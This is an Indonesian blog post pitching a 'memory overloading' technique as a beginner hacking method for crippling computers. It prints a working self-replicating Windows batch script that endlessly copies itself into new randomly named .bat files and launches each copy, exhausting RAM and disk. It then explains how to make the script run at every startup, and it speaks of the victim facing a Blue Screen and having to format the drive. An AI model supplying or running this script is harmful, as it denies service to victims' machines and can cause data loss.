Memulai H4cking Dengan Teknik Overloading Memory

komputerdia.com - Masih membicarakan masalah tahap awal pada teknik h4cking, jika sebelumnya saya telah menjelaskan bagaimana cara melakukan Bomb Fork dan Application flooder. Pada artikel ini saya akan mencoba menjelaskan bagaimana cara membuat teknik awal untuk melumpuhkan suatu perangkat komputer dengan menggunakan metode gabungan antra fork bomb dengan application flooder, teknik ini biasa dikenal dengan istilah Overloading Memory .

Meskipun pada dasarnya sama-sama berfungsi untuk membebani kapasitas RAM, namun teknik Overloading Memory ini dikalim menjadi suatu teknik dasar dalam dunia h4cking yang cukup populer dan masih banyak digunakan hingga saat ini.

Baca Juga :

Memullai H4cking Dengan Teknik Overloading Memory

Penjelasan Teknik Overloading Memory

Seperti apa yang telah saya sampaikan pada pembuka, bahwa virus ini merupakan gabungan dari bom fork dan aplikasi flooder. Secra Strukturalnya cara ini akan membuat file batch baru di direktori yang sama dan kemudian akan menyalin dirinya ke file baru. 

Kelebihan dari virus ini, bukan hanya membebani suatu ruang kosong pada RAM saja namun teknik ini diklaim bisa memanipulasi ruang kosong pada disk. Meskipun tidak bersifat permanen cara ini cukup ampuh untuk melumpuhkan suatu perangkat komputer, sehingga kita bisa menemukan celah perangkat komputer tersebut dengan sangat mudah.

Baca Juga :


Untuk lebih jelasnya, silahkan kalian lihat kode dibawah ini :
@echo off
:A
set x=%random%
type %0 >> %x%.bat
start %x%.bat
goto:A
Terdapat beberapa keterangan lain yang saya dapatkan dari forum-forum besar h4cking diluar sana, bahwa teknik ini bergantung pada apa yang menghabiskan sebagian besar ruang hard disk atau RAM, file batch ini kemungkinan juga akan mengakibatkan kerusakan yang permanen. Namun, dalam kedua kasus tersebut, komputer sudah dipastikan akan mengalami pasti macet/hang, sistem operasinya mungkin rusak dan pada saat startup berikutnya, sehingga korban akan disambut oleh "Blue Screen Of Death" yang terkenal. Satu-satunya cara untuk menghilangkan virus ini adalah dengan cara install ulang dan memformat hard drive.

(Opsional) Agar file ini dijalankan secara otomatis saat startup, silahkan kalian lakukan hal berikut. 
  • Buat shortcut dari file damage.bat dengan mengklik kanan di atasnya. 
  • Buka menu start, 
  • Di program Open Startup folder dan cukup drag atau cut-paste shortcut ke folder ini. 
  • Virus akan berjalan saat komputer dinyalakan.

.
.

Berlangganan Artikel terbaru (free):

Post a Comment